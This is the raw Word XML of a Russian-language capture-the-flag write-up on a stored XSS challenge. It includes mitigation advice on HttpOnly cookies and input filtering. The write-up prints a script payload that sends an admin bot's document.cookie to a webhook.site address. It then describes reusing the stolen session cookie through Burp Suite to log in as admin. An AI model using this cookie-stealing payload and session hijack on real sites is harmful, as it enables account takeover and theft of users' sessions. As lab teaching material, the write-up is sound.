            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="00A928"/>
          </w:rPr>
          <w:t>https://webhook.site</w:t>
        </w:r>
      </w:hyperlink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поможет нам отсылать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cookie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определённый адрес, мы будем забирать их с этого адреса и использовать для авторизации.</w:t>
      </w:r>
      <w:r w:rsidR="00ED4BB4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ED4BB4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Burp</w:t>
      </w:r>
      <w:r w:rsidR="00ED4BB4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ED4BB4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Suite</w:t>
      </w:r>
      <w:r w:rsidR="00ED4BB4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поможет </w:t>
      </w:r>
      <w:r w:rsid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изменить</w:t>
      </w:r>
      <w:r w:rsidR="00ED4BB4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ED4BB4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cookie</w:t>
      </w:r>
      <w:r w:rsidR="00ED4BB4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нашем логине и зайти под учётной записью </w:t>
      </w:r>
      <w:r w:rsidR="00ED4BB4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admin</w:t>
      </w:r>
      <w:r w:rsidR="00ED4BB4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9D35B62" w14:textId="262F2963" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="003008AB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Регистрируем свою учётную запись на сайте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A538358" w14:textId="1F66AA62" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="003008AB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На открывшейся главное странице просмотрим все ссылки</w:t>
      </w:r>
      <w:r w:rsidR="00557B5A" w:rsidRPr="00557B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(1)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. Ссылки, кроме “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Home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” и “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Vocation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” делают выход из учётной записи. Только у ссылки “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Vocation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” есть поля для ввода.</w:t>
      </w:r>
      <w:r w:rsidR="00363D05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Сначала отправим пробный запрос, чтобы посмотреть</w:t>
      </w:r>
      <w:r w:rsidR="00BE366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="00363D05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что произойдёт</w:t>
      </w:r>
      <w:r w:rsidR="00557B5A" w:rsidRPr="00557B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(2)</w:t>
      </w:r>
      <w:r w:rsidR="00363D05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912F19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выполнении запроса мы видим статус “</w:t>
      </w:r>
      <w:r w:rsidR="00912F19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Wait</w:t>
      </w:r>
      <w:r w:rsidR="00912F19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="00557B5A" w:rsidRPr="00557B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57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="00912F19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. Статус</w:t>
      </w:r>
      <w:r w:rsidR="00BE366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="00912F19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BE36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примерно, </w:t>
      </w:r>
      <w:r w:rsidR="00912F19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означает, что управляющий сайта посмотрит этот запрос и выполнит какие-то действия. В данном случае это бот, который проходит с определённым интервалом времени, у бота мы будем забирать </w:t>
      </w:r>
      <w:r w:rsidR="00912F19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cookie</w:t>
      </w:r>
      <w:r w:rsidR="00532CD6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Так как </w:t>
      </w:r>
      <w:r w:rsidR="00532CD6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cookie</w:t>
      </w:r>
      <w:r w:rsidR="00532CD6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статичны, необходимо быстро авторизоваться, пока </w:t>
      </w:r>
      <w:r w:rsidR="00532CD6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cookie</w:t>
      </w:r>
      <w:r w:rsidR="00532CD6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обновились.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B82E08" w14:textId="46F4F88E" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="00325FA5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 как у нас один способ отправлять данные для админа, мы должны добавить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script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Script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отсылать информацию на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webhook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адрес и будет выводить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cookie</w:t>
      </w:r>
      <w:r w:rsidR="00C10FA0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EF02E09" w14:textId="2A4A5854" w:rsidR="00C10FA0" w:rsidRPr="006B3AE2" w:rsidRDefault="00C10FA0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Команда для вставки в поле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message</w:t>
      </w:r>
      <w:r w:rsidR="00557B5A" w:rsidRPr="00557B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="007025E7" w:rsidRPr="007025E7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 w:rsidR="00557B5A" w:rsidRPr="00557B5A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70BEF5F1" w14:textId="77777777" w:rsidR="00C10FA0" w:rsidRPr="006B3AE2" w:rsidRDefault="00C10FA0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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFCD375" w14:textId="0D02B206" w:rsidR="00C10FA0" w:rsidRPr="006B3AE2" w:rsidRDefault="00C10FA0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document.location=</w:t>
      </w:r>
      <w:r w:rsidR="007025E7" w:rsidRPr="007025E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00E51B48" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>https://webhook.site/e4917fff-f055-41ae-9bb7-e165f33cc47a</w:t>
      </w:r>
      <w:r w:rsidR="007025E7" w:rsidRPr="007025E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>'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+document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D6887" w14:textId="0744AFD8" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="00C10FA0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&lt;/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script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711A9A74" w14:textId="24A43BB2" w:rsidR="00312587" w:rsidRPr="006B3AE2" w:rsidRDefault="00312587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B92D057" w14:textId="2AA7A5EF" w:rsidR="00312587" w:rsidRPr="006B3AE2" w:rsidRDefault="00312587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Ждём, когда </w:t>
      </w:r>
      <w:r w:rsidR="0059681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появятся </w:t>
      </w:r>
      <w:r w:rsidR="00596813" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="0059681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сайте </w:t>
      </w:r>
      <w:r w:rsidR="00596813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webhook</w:t>
      </w:r>
      <w:r w:rsidR="00BA5285" w:rsidRPr="00BA52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="007025E7" w:rsidRPr="007025E7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="00BA5285" w:rsidRPr="00BA5285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="0059681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статус поменяется на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Watched</w:t>
      </w:r>
      <w:r w:rsidR="0059681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сайте</w:t>
      </w:r>
      <w:r w:rsidR="00557B5A" w:rsidRPr="00557B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="007025E7" w:rsidRPr="007025E7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="00557B5A" w:rsidRPr="00557B5A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="0059681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96F4D39" w14:textId="3A647A39" w:rsidR="00F12773" w:rsidRPr="006B3AE2" w:rsidRDefault="00F12773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 будут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cookie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перехвачены необходимо выйти из своей учётной записи на сайте.</w:t>
      </w:r>
      <w:r w:rsidR="00834A7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Авторизоваться будет с перехватом от </w:t>
      </w:r>
      <w:r w:rsidR="00834A73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Burp</w:t>
      </w:r>
      <w:r w:rsidR="00834A7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34A73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Suite</w:t>
      </w:r>
      <w:r w:rsidR="00834A7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BB19DF8" w14:textId="6029A398" w:rsidR="00984B91" w:rsidRPr="006B3AE2" w:rsidRDefault="00984B91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Burp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Suite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перехватит наш логин, необходимо поменять сессионные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cookie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сессионные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cookie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которые получены от бота. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3875F222" w14:textId="05E2F96F" w:rsidR="00742A38" w:rsidRPr="006B3AE2" w:rsidRDefault="00742A38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Обновим страницу сайта.</w:t>
      </w:r>
      <w:r w:rsidR="00C73D8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Статус изменился на </w:t>
      </w:r>
      <w:r w:rsidR="007025E7" w:rsidRPr="007025E7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C73D83"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Watched</w:t>
      </w:r>
      <w:r w:rsidR="007025E7" w:rsidRPr="007025E7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="00557B5A" w:rsidRPr="0001528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="007025E7" w:rsidRPr="007025E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00557B5A" w:rsidRPr="0001528D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="00C73D83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B7C0790" w14:textId="533881DE" w:rsidR="00742A38" w:rsidRDefault="00CD784D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появившихся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cookie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нам необходимы со слова </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="0001528D" w:rsidRPr="0001528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1528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сайте </w:t>
      </w:r>
      <w:r w:rsidR="0001528D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>webhook</w:t>
      </w:r>
      <w:r w:rsidR="0001528D" w:rsidRPr="0001528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="007025E7" w:rsidRPr="007025E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="0001528D" w:rsidRPr="0001528D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="007025E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копируем их и выходим из учётной записи. Включаем перехват и заново авторизуемся на сайте. Видим сессионные </w:t>
      </w:r>
      <w:r w:rsidR="007025E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00D02B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="00D02BC6" w:rsidRPr="00D02BC6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D02BC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00D02BC6" w:rsidRPr="00D02B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="00D02BC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00D02BC6" w:rsidRPr="00D02BC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=”</w:t>
      </w:r>
      <w:r w:rsidR="007025E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меняем их </w:t>
      </w:r>
      <w:r w:rsidR="00A84D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сайта </w:t>
      </w:r>
      <w:r w:rsidR="00A84DA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>webhook</w:t>
      </w:r>
      <w:r w:rsidR="00A84D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нажимаем </w:t>
      </w:r>
      <w:r w:rsidR="00D02BC6" w:rsidRPr="00D02BC6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A84DA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Forward</w:t>
      </w:r>
      <w:r w:rsidR="00D02BC6" w:rsidRPr="00D02BC6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="00A84DA2" w:rsidRPr="00A84D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84D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="00A84DA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidR="00A84DA2" w:rsidRPr="00A84D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84DA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Suit</w:t>
      </w:r>
      <w:r w:rsidR="00A84DA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, получаем флаг</w:t>
      </w:r>
      <w:r w:rsidR="00D02B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(9):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0218D8" w14:textId="58CFC49A" w:rsidR="00FA7151" w:rsidRPr="00FA7151" w:rsidRDefault="00FA7151" w:rsidP="00D02BC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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA715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flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA715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{XS$_@nD_ClienT_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA715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SiDe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA715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_@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA715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TTack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA715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$}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020784D7" w14:textId="12B9C3FC" w:rsidR="00596813" w:rsidRDefault="00596813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BA0634D" w14:textId="6AE3B6AE" w:rsidR="0001528D" w:rsidRPr="0001528D" w:rsidRDefault="0001528D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1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537B40CA" w14:textId="4A25AA29" w:rsidR="00500045" w:rsidRPr="006B3AE2" w:rsidRDefault="003008AB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114782E5" wp14:editId="302DFC30">
            <wp:extent cx="5733415" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="63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045" w:rsidRPr="006B3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21FDC874" w14:textId="3CE42B0B" w:rsidR="00E94B63" w:rsidRDefault="00E94B63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8542C53" w14:textId="43D13537" w:rsidR="0001528D" w:rsidRPr="0001528D" w:rsidRDefault="0001528D" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567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2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F44739" w14:textId="0BCF5F7A" w:rsidR="00E94B63" w:rsidRPr="006B3AE2" w:rsidRDefault="00E94B63" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU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2A4A3A13" wp14:editId="51C65BD3">
            <wp:extent cx="5733415" cy="2495550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7A60" w14:textId="4DF99169" w:rsidR="00912F19" w:rsidRPr="006B3AE2" w:rsidRDefault="00912F19" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545025E4" w14:textId="5DD25DFF" w:rsidR="00BE3664" w:rsidRPr="00BE3664" w:rsidRDefault="007025E7" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00BE3664">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4C4F7E" w14:textId="1EB30193" w:rsidR="00912F19" w:rsidRPr="006B3AE2" w:rsidRDefault="00912F19" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU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49D78918" wp14:editId="6F177A05">
            <wp:extent cx="5733415" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="26" name="Рисунок 2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AE05" w14:textId="319710EA" w:rsidR="00E51B48" w:rsidRDefault="00E51B48" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B70A678" w14:textId="6EC2D943" w:rsidR="00BE3664" w:rsidRPr="006B3AE2" w:rsidRDefault="007025E7" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567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GB"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00BE3664">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3361404D" w14:textId="74F7CD37" w:rsidR="00E51B48" w:rsidRPr="006B3AE2" w:rsidRDefault="00E51B48" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU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041BC1D1" wp14:editId="16462137">
            <wp:extent cx="5733415" cy="2828925"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="27" name="Рисунок 2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9DC8" w14:textId="4D2032C3" w:rsidR="00312587" w:rsidRDefault="00312587" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6748345C" w14:textId="15D76D20" w:rsidR="00BE3664" w:rsidRPr="006B3AE2" w:rsidRDefault="007025E7" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567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GB"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00BE3664">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F40AC" w14:textId="37681D85" w:rsidR="00312587" w:rsidRPr="006B3AE2" w:rsidRDefault="00312587" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU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7CE805F4" wp14:editId="44B0382E">
            <wp:extent cx="5733415" cy="1361440"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="29" name="Рисунок 2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44DE" w14:textId="77777777" w:rsidR="00312587" w:rsidRPr="006B3AE2" w:rsidRDefault="00312587" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BF62A8" w14:textId="10253520" w:rsidR="00312587" w:rsidRPr="006B3AE2" w:rsidRDefault="007025E7" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567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GB"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00BE3664">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693CDAD7" w14:textId="703AEDE9" w:rsidR="00312587" w:rsidRPr="006B3AE2" w:rsidRDefault="00312587" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU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6B9157F8" wp14:editId="5E270AE7">
            <wp:extent cx="5733415" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="28" name="Рисунок 28" descr="Изображение выглядит как текст, снимок экрана, экр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F23E" w14:textId="07EAEBE6" w:rsidR="00742A38" w:rsidRPr="006B3AE2" w:rsidRDefault="00742A38" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9E7949" w14:textId="3F511429" w:rsidR="00BB34D7" w:rsidRPr="006B3AE2" w:rsidRDefault="007025E7" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567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GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00BE3664">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B68282E" w14:textId="3F57322C" w:rsidR="00FA7151" w:rsidRDefault="00742A38" w:rsidP="00FA7151">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F465AA" wp14:editId="4FBC47E6">
            <wp:extent cx="5733415" cy="1370965"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="30" name="Рисунок 3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8EDD" w14:textId="42B6E661" w:rsidR="00FA7151" w:rsidRDefault="007025E7" w:rsidP="00FA7151">
      <w:pPr>
        <w:ind w:firstLine="567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8</w:t>
      </w:r>
      <w:r w:rsidR="0049511A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B65F488" w14:textId="6092F688" w:rsidR="00FA7151" w:rsidRDefault="00FA7151" w:rsidP="00FA7151">
      <w:pPr>
        <w:ind w:firstLine="567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6E802456" wp14:editId="606011AD">
            <wp:extent cx="5733415" cy="1486535"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="11" name="Рисунок 1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B3B3" w14:textId="13E488F7" w:rsidR="00FA7151" w:rsidRDefault="00FA7151" w:rsidP="00FA7151">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416721AE" w14:textId="0A4B04DA" w:rsidR="0049511A" w:rsidRDefault="007025E7" w:rsidP="00FA7151">
      <w:pPr>
        <w:ind w:firstLine="567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9</w:t>
      </w:r>
      <w:r w:rsidR="0049511A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5A394" w14:textId="72E5D44F" w:rsidR="00FA7151" w:rsidRPr="00FA7151" w:rsidRDefault="00FA7151" w:rsidP="00FA7151">
      <w:pPr>
        <w:ind w:firstLine="567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760ED607" wp14:editId="6A4DABF2">
            <wp:extent cx="5733415" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="63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405D" w14:textId="69491B15" w:rsidR="00BB34D7" w:rsidRPr="006B3AE2" w:rsidRDefault="00BB34D7" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BE9C07" w14:textId="483961B2" w:rsidR="00BB34D7" w:rsidRPr="006B3AE2" w:rsidRDefault="00BB34D7" w:rsidP="00BB34D7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr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Рекомендации, к</w:t>
      </w:r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ак защищаться от </w:t>
      </w:r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XSS</w:t>
      </w:r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stored</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5CA1FA" w14:textId="77777777" w:rsidR="00BB34D7" w:rsidRPr="006B3AE2" w:rsidRDefault="00BB34D7" w:rsidP="00BB34D7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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8DE4356" w14:textId="014A1318" w:rsidR="00BB34D7" w:rsidRPr="006B3AE2" w:rsidRDefault="00BB34D7" w:rsidP="00BB34D7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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6B3AE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1. </w:t>
      </w:r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Флаг </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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— запрещает доступ к файлу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE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51C9DCDC" w14:textId="184A63C1" w:rsidR="00BB34D7" w:rsidRPr="00557B5A" w:rsidRDefault="00BB34D7" w:rsidP="00BB34D7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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6B3AE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2. </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фильтрация — изменение данных, введенных пользователем, с целью повышения уровня безопасности.</w:t>
      </w:r>
      <w:r w:rsidR="00557B5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</w:p>
    <w:p w14:paraId="34A0D2AA" w14:textId="77777777" w:rsidR="00BB34D7" w:rsidRPr="006B3AE2" w:rsidRDefault="00BB34D7" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
